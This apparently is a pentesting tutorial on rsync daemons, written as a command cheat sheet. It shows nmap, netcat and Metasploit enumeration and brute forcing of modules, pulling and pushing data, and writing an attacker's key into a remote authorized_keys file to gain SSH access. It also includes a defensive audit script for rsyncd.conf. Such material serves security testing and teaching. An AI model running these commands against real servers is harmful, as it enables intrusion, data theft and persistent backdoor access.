Rsync Pentesting

Last modified: 2023-02-06

Network

Rsync is a utility for efficiently transferring and synchronizing files between a computer and a storage drive, or between networked computers, by comparing the modification times and sizes of files. The rsync daemon listens on port 873 by default.

Enumeration

nmap --script rsync-list-modules -p 873 <target-ip>
nmap --script rsync-brute --script-args 'rsync-brute.module=www' <target-ip>

# Banner grabbing and listing shared folders (modules)
# After the daemon sends its '@RSYNCD: <version>' banner, send the same line back; '#list' then prints the modules, and a module name found this way can be sent in the same fashion.
nc -nv <target-ip> 873
@RSYNCD: 31.0
#list
raidroot
Conf
@RSYNCD: EXIT

# List sync data using rsync
rsync <target-ip>::
rsync -av --list-only rsync://<target-ip>

# List sync data using Metasploit
msf> use auxiliary/scanner/rsync/modules_list

Once a shared folder (module) has been found, check whether it can be accessed without authentication.
Assume that enumeration found a module named “shares”.

# Netcat
nc -nv <target-ip> 873
@RSYNCD: 31.0
shares
@RSYNCD: OK
# '@RSYNCD: OK' means the module accepts connections without authentication; '@RSYNCD: AUTHREQD <challenge>' means credentials are required.

# Rsync
rsync <target-ip>::shares
rsync -av --list-only rsync://<target-ip>:873/shares

Check Config File

find / -name "rsyncd.conf" 2>/dev/null
cat /path/to/rsyncd.conf
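The same file tells a defender which modules are exposed. As an added example (not from the original page and not part of rsync itself), the POSIX shell audit below reads an rsyncd.conf and flags the settings the enumeration above relies on: modules with no `auth users`, `read only = no`, no `hosts allow`, or a root `uid`. The sample config is constructed; in practice feed it the file located with the `find` command above.

```shell
#!/bin/sh
# Added example, not from the original page: audit an rsyncd.conf for modules exposed the way
# the enumeration above finds them. Daemon defaults when a parameter is absent: read only = yes,
# no "auth users" (anonymous access), and no "hosts allow" (every client address accepted).

audit_rsyncd_conf() {
    # Reads rsyncd.conf text on stdin; prints one finding per line as "<module>: <issue>".
    # Global parameters apply to every module unless the module overrides them.
    awk '
    function flush() {
        if (mod == "") return
        if (!("auth users" in kv)) print mod ": no \"auth users\" (anonymous access)"
        if (("read only" in kv) && kv["read only"] ~ /^(no|false|0)$/) print mod ": writable (read only = no)"
        if (!("hosts allow" in kv)) print mod ": no \"hosts allow\" restriction"
        if (("uid" in kv) && kv["uid"] ~ /^(root|0)$/) print mod ": module runs as root"
        delete kv
    }
    /^[ \t]*[#;]/ || /^[ \t]*$/ { next }            # skip comments and blank lines
    /^[ \t]*\[.*\][ \t]*$/ {                         # start of a [module] section
        flush()
        mod = $0; gsub(/^[ \t]*\[|\][ \t]*$/, "", mod)
        for (k in glob) kv[k] = glob[k]              # inherit global settings
        next
    }
    /=/ {
        key = tolower($0); sub(/=.*/, "", key); gsub(/^[ \t]+|[ \t]+$/, "", key)
        val = tolower($0); sub(/^[^=]*=/, "", val); gsub(/^[ \t]+|[ \t]+$/, "", val)
        if (mod == "") glob[key] = val; else kv[key] = val
    }
    END { flush() }'
}

# Constructed sample: "shares" is the anonymous, writable module this page enumerates;
# "backup" shows the same module with authentication, a read-only flag and a host restriction.
SAMPLE_CONF='uid = nobody

[shares]
    path = /srv/shares
    read only = no

[backup]
    path = /srv/backup
    auth users = backup
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/24
    read only = yes
'

printf '%s\n' "$SAMPLE_CONF" | audit_rsyncd_conf
```

Run against the sample, it reports three findings for "shares" and none for "backup".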

Sync Data

After gathering modules (shared folders), we can sync them to a local folder.

From Remote to Local

We can sync a remote folder with a local folder.

# -a: Archive mode (recursive, preserves permissions, timestamps, symlinks, etc.)
# -v: Verbose
rsync -av <remote-ip>::<src_dir> <dest_dir>

# e.g. assuming enumeration found a module named "share"
mkdir test_shared
rsync -av <remote-ip>::share test_shared
rsync -av rsync://<remote-ip>:873/share test_shared

To push changes, modify the files in the local copy and then sync them back as described under “From Local to Remote”.

From Local to Remote

We can sync our local folder with a remote folder.

# -a: Archive mode (recursive, preserves permissions, timestamps, symlinks, etc.)
# -v: Verbose
rsync -av <src_dir> <remote-ip>::<dest_dir>

# e.g. assuming enumeration found a module named "share"
rsync -av test_shared <remote-ip>::share
rsync -av test_shared rsync://<remote-ip>:873/share

SSH Key Syncing and SSH Login

1. Generate an SSH key on the local machine

Write the public key into an authorized_keys file.

ssh-keygen -f testkey
cat testkey.pub > authorized_keys

2. Sync authorized_keys into the remote user's .ssh directory

rsync authorized_keys rsync://<remote-user>@<remote-ip>:873/<home_user>/.ssh

3. SSH login with the generated private key

ssh <remote-home-user>@<remote-ip> -i testkey